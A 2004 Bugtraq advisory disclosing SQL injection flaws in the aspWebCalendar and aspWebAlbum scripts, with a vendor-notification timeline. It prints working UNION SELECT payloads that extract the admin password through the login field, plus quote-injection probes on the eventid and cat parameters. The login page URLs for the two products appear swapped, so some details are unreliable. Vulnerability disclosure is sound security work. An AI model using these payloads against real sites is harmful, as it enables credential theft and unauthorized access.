List: bugtraq
Subject: aspWebCalendar /aspWebAlbum: SQL injection
From: Pedro Sanches <pedro_sanches () sapo ! pt>
Date: 2004-09-23 18:27:02
Message-ID: 20040923182702.17881.qmail () www ! securityfocus ! com
[1]Introduction
"aspWebCalendar is an .asp (Active Server Pages) script that allows you to easily create an online events calendar that supports multiple users. Easy installation and usage are the key features of aspWebCalendar. The script contains a text file with a few configuration variables that are used by the script... Just change one of these variables, upload the files and you are up and running."
"aspWebAlbum is an .asp (Active Server Pages) script that allows you to easily create an online photo album or gallery simply by uploading images to your server... the script will do the rest. Easy installation and usage are the key features of aspWebAlbum. The script contains a text file with several configuration variables that are used by the script... just change two of these and you are up and running. To add images simply upload them to your server, it's that simple."
This information was taken from http://www.jancw.dk/, but the vendor of this software is Full Revolution and its website can be found at www.fullrevolution.com
[2]The Problem
Both scripts can run on SQL Server or Access databases, and both database variants ship in the box. Installations that use the default SQL file are vulnerable to SQL injection, allowing, for example, an attacker to view table contents by reading the ASP error messages.
(1) For the aspWebCalendar, in the login pages:
"www.example.com/album.asp?action=login"
you can put this in the username field (leaving the password blank) to extract the password for the 'admin' user, if it exists:
" ' union select Cal_User_Password,1,1,1,1,1,1,1,1,1 from Cal_User where Cal_User_UserName = 'admin'-- "
(1.1) The 'eventid' field is vulnerable to SQL injection too:
"www.example.com/calendar.asp?action=eventdetail&eventid='"
(2) For the aspWebAlbum, the login pages can be found at "www.example.com/calendar.asp?action=login" and the problem is the same (I'll use the same example as above):
"' union select Gal_UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Gal_Users where Gal_UserUserName = 'admin' --"
(2.2) The 'cat' field is also a problem in this example:
"www.example.com/album.asp?cat='"
At the moment all the SQL Server versions of this software seem to be affected.
[3]Timeline
(28/8/2004) vuln discovered
(29/8/2004) short note posted at johnny.ihackstuff.com forums
(15/9/2004) vendor notified, still no reply
[4]Feedback
cybercide@megamail.pt
(This is my first vulnerability disclosure so if there's a mistake here don't hurt me too much :-) )